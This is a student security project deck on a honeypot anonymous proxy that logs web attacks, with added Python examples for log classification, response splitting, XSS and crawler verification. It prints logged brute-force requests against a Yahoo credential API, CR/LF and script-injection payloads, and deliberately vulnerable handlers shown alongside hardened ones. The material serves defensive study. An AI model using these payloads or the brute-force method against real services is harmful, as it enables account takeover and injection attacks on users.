Web Security Project

chunkyscreechServers

Dec 4, 2013

Creating an anonymous proxy server to monitor and analyze new web-based attacks


Mentors: Amichai Shulman, Eldad Chai

Students: Nadav Amit, Dani Daniel

Project Goals & Objectives

Main Goals

1. Being able to log real malicious web-based attacks.
2. Identify new malicious web attacks.
3. Determine which attacks are in common use, in order to focus on defending against them.

Main Objectives

1. Creating a working, stable anonymous proxy server that can log real web-based attacks. Web attackers usually go through anonymous proxy servers to avoid being traced; running such a proxy ourselves therefore puts us directly in the path of their attacks.
2. Creating a tool that can analyze the logs in order to detect patterns of web-based attacks and produce statistics of the most commonly used attacks.

Project Architecture

[Diagram: Hacker -> Highly Anonymous Proxy (Proxy Server on VMWare; Honey Pot Machine) -> Web Server; Computer A, Computer B; Data Search & Index Tool]

Architecture Components

1. Proxy Server
   - Unix-based machine.
   - Installed on a VMWare virtual machine (easy to reconstruct if attacked).
   - Based on a "Privoxy" server; writes all connection logs to local files.
   - The server also runs an FTP server to allow easy extraction of the data.
   - A GeoIP API is used to resolve the country of each attacker's source IP.
   - Low-ASCII (control) characters are encoded before they are written, so that bytes such as EOF inside a request remain visible in the logs and do not corrupt them during analysis.
   - A cron job archives the logs.

2. Backup Agent
   - Cobian Backup
   - Unzip script

3. Splunk
   - Data indexing and search tool.
   - Enables logging of known attacks.
   - Enables querying and analysis of the recorded accesses.
   - Fields and tags were created to allow easy data extraction.


Yahoo Brute Force Attack

Attack Purpose: retrieve Yahoo login credentials.

Attack Scenario: Yahoo runs many servers around the world (for load sharing, backup, etc.), and these servers communicate with each other through a web API. Attackers use this interface to impersonate a Yahoo server and retrieve users' credentials.

How Is It Done? If you simply try to log in to Yahoo too many times you are asked to solve a "CAPTCHA". But if you use the following API against a Yahoo server instead:

"/config/isp_verify_user?l=<SomeUsername>&p=<SomePassword>"

you can verify that a certain username exists, and then brute force which password grants access to the account, with no CAPTCHA in the way.

For example:

http://124.108.120.50/config/isp_verify_user?l=israel&p=israeli

Attack Method: use anonymous proxies to try logging in with many usernames and passwords on Yahoo servers. Since there are many Yahoo servers around the world which are not synchronized with each other, an attacker can spread the attempts over many of them. In addition, once you add proxy servers into the equation (by multiplying), you get even more.

Many tools exist to do this, with and without proxies: [tool screenshots]

This diagram shows the number of attempts that went through our proxy over a 10-day period. This is only from our proxy!

In blue: successful attacks.
In red: response 999, meaning the server detected the attack.

Targeted Yahoo hosts in the diagram:

edit.yahoo.com, login.yahoo.com, edit.europe.yahoo.com, edit.in.yahoo.com, edit.vip.tpe.yahoo.com
e3.edit.cnb.yahoo.com, e4.edit.cnb.yahoo.com, e1.edit.vip.sc5.yahoo.com, e3.yahoo.co.kr
e1.member.ukl.yahoo.com, e2.member.ukl.yahoo.com, e3.member.ukl.yahoo.com, e4.member.ukl.yahoo.com, e5.member.ukl.yahoo.com, e6.member.ukl.yahoo.com
sbc1.login.dcn.yahoo.com, sbc1.login.vip.dcn.yahoo.com
l2, l3, l4, l5, l6, l7, l8, l9, l10, l11, l12, l13, l14, l15, l16, l18, l19, l20, l22, l23, l29, l30 .login.dcn.yahoo.com
l1, l2, l3, l4, l5, l6, l7, l8, l9, l10, l11, l12, l13, l15, l30 .login.scd.yahoo.com


Yahoo Brute Force Attack

Typical Attack headers

Jun 06 12:22:06.101 b2caeb90 Analysis: ip: 24.86.107.62
Country: Canada
GET /config/isp_verify_user?l=hu.&p=lillian HTTP/1.0
Host: 203.212.170.100
Referer: http://203.212.170.100
Accept-Language: en
X-Forwarded-For: 77.125.93.72:8118, yahoo.com
Cookie: Y=v=1-;
Connection: close

Jun 06 12:22:06.292 b34afb90 Analysis: ip: 201.68.195.20
Country: Brazil
GET /config/isp_verify_user?l=angel_annabel&p=2020 HTTP/1.0
Host: 124.108.120.50
YahooRemoteIP: 217.12.5.161
Referer: http://124.108.120.50
Accept-Language: en
Connection: Close
X-Forwarded-For: 69.147.112.216, google.com
Accept: */*

Jun 06 12:22:10.483 a7497b90 Analysis: ip: 75.184.119.157
Country: United States
GET /config/login?.patner=sbc&login=david+2&passwd=flag&.save=1 HTTP/1.0
Connection: close
Accept: */*
Accept-Language: en
Host: l05.member.re3.yahoo.com
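The following is an added example, not the project's own analysis tooling. It parses log records in the layout shown on the slides (timestamp, thread id, "Analysis: ip:", "Country:", then the raw request and its headers, one record per blank-line-separated block), applies the low-ASCII encoding the proxy performs before logging, labels each record with one of the attack families discussed in this deck, and summarises Yahoo login probes per connecting IP in the way the Splunk fields and tags were meant to support. The sample records, the label names and the alert threshold are constructed for the example; the client IPs come from documentation ranges, only the target hosts are ones that appear on the slides.

```python
"""Parser and first-pass classifier for the proxy's log records.

Added example; not the project's tooling.  Record layout follows the
slides; the sample log, labels and threshold below are constructed.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample log.  One source makes three Yahoo login probes against
# three different Yahoo hosts, one client claims to be Googlebot, and one
# asks for a CONNECT tunnel to port 25 (the SMTP-over-HTTP case).
SAMPLE_LOG = (
    "Jun 06 12:22:06.101 b2caeb90 Analysis: ip: 198.51.100.7\n"
    "Country: Canada\n"
    "GET /config/isp_verify_user?l=hu.&p=lillian HTTP/1.0\n"
    "Host: 203.212.170.100\n"
    "X-Forwarded-For: 77.125.93.72:8118, yahoo.com\n\n"
    "Jun 06 12:22:06.292 b34afb90 Analysis: ip: 198.51.100.7\n"
    "Country: Canada\n"
    "GET /config/isp_verify_user?l=hu.&p=lillian1 HTTP/1.0\n"
    "Host: 124.108.120.50\n\n"
    "Jun 06 12:22:07.010 a7497b90 Analysis: ip: 198.51.100.7\n"
    "Country: Canada\n"
    "GET /config/login?.partner=sbc&login=hu.&passwd=lillian2 HTTP/1.0\n"
    "Host: l05.member.re3.yahoo.com\n\n"
    "Jun 06 12:22:10.483 8acf1b90 Analysis: ip: 203.0.113.44\n"
    "Country: China\n"
    "GET /forum-20-1.html HTTP/1.0\n"
    "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\n"
    "Host: xgymcn.5d6d.com\n\n"
    "Jun 06 12:22:11.000 add54b90 Analysis: ip: 203.0.113.71\n"
    "Country: Germany\n"
    "CONNECT 198.51.100.25:25 HTTP/1.0\n"
    "Host: 198.51.100.25:25\n"
)

RECORD_HEAD = re.compile(r"^(?P<ts>\w{3} \d\d \d\d:\d\d:\d\d\.\d+) "
                         r"(?P<thread>[0-9a-f]+) Analysis: ip: (?P<ip>[0-9.]+)$")


def escape_low_ascii(s):
    """Write control bytes as \\xNN, as the proxy does before logging, so a
    NUL, EOF or CR/LF inside a request stays visible and cannot break the
    one-field-per-line record layout."""
    return "".join(c if 0x20 <= ord(c) < 0x7F else "\\x%02x" % ord(c) for c in s)


def parse_records(text):
    """Turn blank-line-separated records into dicts; skip malformed ones."""
    records = []
    for chunk in re.split(r"\n[ \t]*\n", text.strip()):
        lines = chunk.split("\n")
        head = RECORD_HEAD.match(lines[0])
        parts = escape_low_ascii(lines[2]).split(" ") if len(lines) > 2 else []
        if not head or len(parts) != 3:
            continue
        rec = head.groupdict()
        rec["country"] = lines[1].partition(":")[2].strip()
        rec["method"], rec["target"], rec["version"] = parts
        rec["headers"] = {k.strip().lower(): v.strip()
                          for k, _, v in (h.partition(":") for h in lines[3:]) if k}
        records.append(rec)
    return records


def classify(rec):
    """Label a record with one of the attack families seen on the slides."""
    target = rec["target"]
    blob = (target + " " + rec["headers"].get("referer", "")).lower()
    if rec["method"] == "CONNECT":
        return "smtp-over-http" if target.endswith(":25") else "connect-tunnel"
    if urlsplit(target).path.lower() in ("/config/isp_verify_user", "/config/login"):
        return "yahoo-brute-force"
    if "%0d%0a" in blob:
        return "response-splitting"
    if "<script" in blob or "%3cscript" in blob:
        return "xss"
    if re.search(r"googlebot|msnbot|bingbot", rec["headers"].get("user-agent", ""), re.I):
        return "crawler-impersonation"  # a real crawler does not fetch via an open proxy
    return "other"


def brute_force_sources(records, min_attempts=3):
    """Per connecting IP: Yahoo login probes and the distinct usernames,
    passwords and target hosts tried.  Keyed on the connecting IP because
    X-Forwarded-For is client-supplied (the slides' records carry values
    such as "google.com" in it).  min_attempts is an arbitrary threshold."""
    stats = defaultdict(lambda: {"attempts": 0, "users": set(),
                                 "passwords": set(), "hosts": set()})
    for rec in records:
        if classify(rec) != "yahoo-brute-force":
            continue
        q = parse_qs(urlsplit(rec["target"]).query)
        s = stats[rec["ip"]]
        s["attempts"] += 1
        s["users"].add((q.get("l") or q.get("login") or [""])[0])
        s["passwords"].add((q.get("p") or q.get("passwd") or [""])[0])
        s["hosts"].add(rec["headers"].get("host", ""))
    return {ip: s for ip, s in stats.items() if s["attempts"] >= min_attempts}
```

Running `brute_force_sources(parse_records(SAMPLE_LOG))` returns the single source 198.51.100.7 with three probes, one username, three passwords and three distinct Yahoo hosts, which is the spread-over-unsynchronised-servers pattern described above; the Googlebot and CONNECT records are labelled but excluded from the brute-force summary.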

Response Splitting Attack

Attack Description

The essence of HTTP Response Splitting is the attacker's ability to send a single HTTP request that forces the web server to form an output stream which is then interpreted by the target (a browser, proxy or cache) as two HTTP responses instead of one. The second response is entirely attacker-controlled; the encoded CR/LF sequences (%0D%0A) in the request below are what build it.

Typical Attack headers

May 30 00:03:58.496 73c84b90 Analysis: ip: 89.149.242.190
Country: Germany
GET /lnv/viewHTTP/1.1%20200%20OK%0D%0ADate:%20Sat,%2030%20May%202009%2003:54:07%20GMT%0D%0AServer:%20Apache/1.3.28%20(Unix)%20PHP/4.3.4%0D%0AX-Powered-By:%20PHP/4.3.4%0D%0ASet-Cookie:%20PHPSESSID=6019eb9689437d8b69f93967be7544a9;%20path=/;%20domain=.sundojungmil.co.kr%0D%0AExpires:%20Thu,%2019%20Nov%201981%2008:52:00%20GMT%0D%0ACache-Control:%20no-store,%20no-cache,%20must-revalidate,%20post-check=0,%20pre-check=0%0D%0APragma:%20no-cache%0D%0AConnection:%20close%0D%0ATransfer-Encoding:%20chunked%0D%0AContent-Type:%20text/html%0D%0A%0D%0Ae3d%0D%0A%0D%0A%3Cscript%20language= HTTP/1.1
Connection: close
Host: forums.lenovo.com
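An added example of the mechanism, not code from the page or from the site that was targeted: a redirect handler that copies a query value into a Location header (the handler and its /home endpoint are invented for illustration), a constructed payload in the same shape as the %0D%0A-laden request logged above, a reader that consumes the resulting bytes the way a naive HTTP/1.1 client or cache would, and the hardened handler that refuses control characters in header values.

```python
"""HTTP response splitting: one request, two responses on the wire.

Added example; the handler, endpoint and payload are constructed.
"""
from urllib.parse import unquote

# Constructed payload: end the real response early (Content-Length: 0 and a
# blank line), then supply a complete second response of the attacker's
# choosing.  The body is exactly 25 bytes, matching its Content-Length.
PAYLOAD = ("en%0D%0AContent-Length:%200%0D%0A%0D%0A"
           "HTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/html%0D%0A"
           "Content-Length:%2025%0D%0A%0D%0A<script>alert(1)</script>")


def vulnerable_redirect(lang):
    """Decodes the parameter and writes it into a header unchecked."""
    value = unquote(lang)
    return (f"HTTP/1.1 302 Found\r\nLocation: /home?lang={value}\r\n"
            f"Content-Length: 0\r\n\r\n").encode("latin-1")


def hardened_redirect(lang):
    """Same handler, but a header value may not contain CR, LF or any other
    control byte.  Reject rather than strip: no legitimate language code
    contains them, and stripping invites encoding-based bypasses."""
    value = unquote(lang)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        raise ValueError("control character in header value")
    return (f"HTTP/1.1 302 Found\r\nLocation: /home?lang={value}\r\n"
            f"Content-Length: 0\r\n\r\n").encode("latin-1")


def split_responses(stream):
    """Read the stream as a naive HTTP/1.1 client or cache does: status line
    and headers up to the blank line, then Content-Length body bytes, then
    the next response.  Returns [(status_line, body), ...]."""
    out = []
    while stream.startswith(b"HTTP/"):
        head, _, rest = stream.partition(b"\r\n\r\n")
        lines = head.split(b"\r\n")
        length = 0
        for line in lines[1:]:
            name, _, val = line.partition(b":")
            if name.strip().lower() == b"content-length":
                length = int(val.strip())
        out.append((lines[0], rest[:length]))
        stream = rest[length:]
    return out


def is_rejected(handler, lang):
    """True if the handler refuses the value instead of emitting a response."""
    try:
        handler(lang)
    except ValueError:
        return True
    return False
```

With the vulnerable handler the reader sees a 302 followed by a second, attacker-written 200 response carrying a script; a shared cache that pairs that second response with the next pipelined request on the connection would serve the attacker's page to other users, which is the poisoning the attack description refers to. The hardened handler never emits the stream at all.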

Cross-Site Scripting Attack

Attack Description

Taking advantage of a security vulnerability, typically found in web applications, which allows code injection by malicious web users into the web pages viewed by other users. In the request below the injected script arrives in the Referer header together with a Baidu search URL.

Typical Attack headers

May 29 22:20:32.730 7f452b90 Analysis: ip: 60.16.140.154
Country: China
GET / HTTP/1.0
Referer: js/bdsug.js?v=1.1.0.3><\/script>')};window.onunload=function(){};window.onload=function(){document.forms[0 http://www.baidu.com/s?ie=gb2312&bs=%B1%F9%E4%BF%C1%E8&sr=&z=&cl=3&f=8&wd=%B1%F9%E4%BF%C1%E8%B0%CD%C8%F0%BF%CB%B1%F9%E4%BF&ct=0
Accept: */*
Accept-Language: zh-cn,en-us
Cookie: BAIDUID=33549062C228F38D3ACF4C8FDF85D5C2:FG=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Hotbar 4.1.8.0; RogueCleaner; Alexa Toolbar)
Host: www.baidu.com
Pragma: no-cache
Connection: close
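An added example, not from the page and not Baidu's code: a constructed search page on a hypothetical host that echoes the query term both into the HTML and into an inline script string, which is the shape of the string-and-script breakout (`')};` followed by `</script>`) visible in the logged Referer above, shown next to the same page with context-appropriate escaping.

```python
"""Reflected XSS: one parameter rendered raw and rendered safely.

Added example; the host, endpoint and payload are constructed.
"""
import html
import json
import re
from urllib.parse import parse_qs, quote, urlsplit

# Constructed payload: closes the JS string literal and the <script>
# element, then opens a script of its own.
PAYLOAD = "x'); </script><script>alert(document.cookie)//"
URL = "http://search.example/s?ie=utf-8&wd=" + quote(PAYLOAD)


def query_term(url):
    return parse_qs(urlsplit(url).query).get("wd", [""])[0]


def vulnerable_page(url):
    """Echoes wd unescaped into an HTML text node and into a JS string."""
    wd = query_term(url)
    return (f"<h1>Results for {wd}</h1>\n"
            f"<script>var q = '{wd}'; suggest(q);</script>")


def hardened_page(url):
    """Escapes per context: HTML entities in the text node; inside the script
    a JSON string literal with < and > additionally escaped, so the text
    '</script>' can never occur in script content whatever wd contains."""
    wd = query_term(url)
    js = json.dumps(wd).replace("<", "\\u003c").replace(">", "\\u003e")
    return (f"<h1>Results for {html.escape(wd, quote=True)}</h1>\n"
            f"<script>var q = {js}; suggest(q);</script>")


def script_openings(page):
    """How many <script ...> starts an HTML tokenizer will see in the page."""
    return len(re.findall(r"<script\b", page, re.I))
```

For the constructed URL the vulnerable page contains three script openings (one from the page, two from the payload, one of them after the payload's `</script>` has closed the page's own script), while the hardened page contains exactly one and still carries the attacker's text as inert data.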

Bots Impersonation Attack

Attack Description

Impersonating Google/MSN bots (by copying their User-Agent strings) to access forums and internet sites and insert malicious data. Sites often admit known search-engine crawlers where ordinary clients are blocked or rate-limited, and a User-Agent header is trivial to forge.

Typical Attack headers

Jun 06 00:28:48.276 8acf1b90 Analysis: ip: 123.149.121.132
Country: China
GET /forum-20-1.html HTTP/1.0
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Host: xgymcn.5d6d.com
Pragma: no-cache
Connection: close
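An added example of the check a site can make instead of trusting the User-Agent; it is not part of the project. The procedure is the one the search engines publish for their crawlers: reverse-resolve the connecting IP, require the PTR name to sit inside the crawler operator's domain, then forward-resolve that name and require it to map back to the same IP. The resolver functions are injected so the example runs offline against a constructed DNS table; the crawler-to-domain mapping and the system resolvers are the only parts meant for real use.

```python
"""Verify a client that claims to be a search-engine crawler.

Added example; the DNS table and the addresses in it are constructed.
"""
import socket

# Token in the User-Agent -> domains the operator's crawler PTR names use.
CRAWLER_DOMAINS = {
    "googlebot": ("googlebot.com", "google.com"),
    "bingbot": ("search.msn.com",),
    "msnbot": ("search.msn.com",),
}

GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"


def claimed_crawler(user_agent):
    """Which crawler the User-Agent claims to be, or None."""
    ua = user_agent.lower()
    return next((name for name in CRAWLER_DOMAINS if name in ua), None)


def verify_crawler(ip, user_agent, reverse_lookup, forward_lookup):
    """True only if the PTR record and its forward confirmation both hold.
    reverse_lookup(ip) -> hostname or None; forward_lookup(host) -> set of IPs."""
    name = claimed_crawler(user_agent)
    if name is None:
        return False
    host = reverse_lookup(ip)
    if not host:
        return False
    host = host.rstrip(".").lower()
    if not any(host == d or host.endswith("." + d) for d in CRAWLER_DOMAINS[name]):
        return False
    # The forward step defeats an attacker who sets a googlebot.com-looking
    # PTR on address space they control: that name resolves elsewhere.
    return ip in forward_lookup(host)


def system_reverse(ip):
    """PTR lookup via the system resolver (for real deployments)."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return None


def system_forward(host):
    """A/AAAA lookup via the system resolver (for real deployments)."""
    try:
        return {info[4][0] for info in socket.getaddrinfo(host, None)}
    except OSError:
        return set()


# Constructed DNS table: a "genuine" crawler address, the IP from the logged
# request above with no PTR at all, and an attacker IP whose PTR was set to
# the genuine crawler's name.
FAKE_PTR = {
    "198.51.100.10": "crawl-198-51-100-10.googlebot.com.",
    "123.149.121.132": None,
    "203.0.113.5": "crawl-198-51-100-10.googlebot.com.",
}
FAKE_A = {"crawl-198-51-100-10.googlebot.com": {"198.51.100.10"}}


def check_fake(ip, user_agent=GOOGLEBOT_UA):
    """Run the verification against the constructed table."""
    return verify_crawler(ip, user_agent, FAKE_PTR.get, lambda h: FAKE_A.get(h, set()))
```

Against the constructed table only 198.51.100.10 passes; the logged 123.149.121.132 fails at the reverse step, and the forged-PTR address fails at the forward step. In a deployment the same `verify_crawler` is called with `system_reverse` and `system_forward`, and the result should be cached per IP so the lookups are not repeated for every request.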

SMTP over HTTP Attack

Attack Description

An HTTP CONNECT request asks the proxy to open a raw TCP tunnel to the given host and port; once the tunnel is up, anything can be sent through it, including SMTP traffic to a mail server, so the proxy's address is what the receiving side sees.

Typical Attack headers

Jun 01 17:22:28.436 add54b90 Analysis: ip: 217.86.183.71
Country: Germany
CONNECT 205.188.251.21:443 HTTP/1.0
Host: 205.188.251.21:443
Connection: close

Other Attacks

One client can send roughly 500,000 e-mails per hour! [http://en.wikipedia.org/wiki/Dark_Mailer]

1. Automatic posting in forums.
2. Click fraud (simulated clicks to earn money, votes in polls, etc.).

Attack Types

55.35%  Yahoo Passwords Brute-Force
26.17%  SMTP Over HTTP
 7.23%  Google Board Posting
 4.71%  X-site scripting / Response Splitting
 4.11%  Click-Frauds
 1.55%  Proxy Checkers
 0.88%  Crawler-Impersonating
Attacks by Server Type

Servers Distribution in the Internet (http://news.netcraft.com/archives/web_server_survey.html)

53.40%  Apache
18.59%  Microsoft-IIS
12.17%  Google
 7.76%  nginx
 1.14%  Baidu
 1.09%  Resin
 0.75%  IBM_HTTP_Server
 0.66%  Yahoo
 0.53%  Squeegit
 0.46%  httpd
 0.44%  FriendFeedServer
 0.42%  lighttpd
 1.58%  Others

Attacked Servers (attacks seen through our proxy, by target server type)

47.17%  Apache
23.34%  Microsoft
12.71%  qq.com
 5.94%  Google
 4.25%  nginx
 0.55%  lighttpd

Originating Countries

44%  Germany
 8%  United Kingdom
 8%  United States
 6%  Israel
 6%  China
 5%  Netherlands
 5%  Brazil
 5%  Luxembourg
 2%  Russian Federation
 2%  Malaysia
 2%  Australia
 1%  France
 7%  Other

The distribution depends on the websites where the proxy was advertised and on the proxy's own location.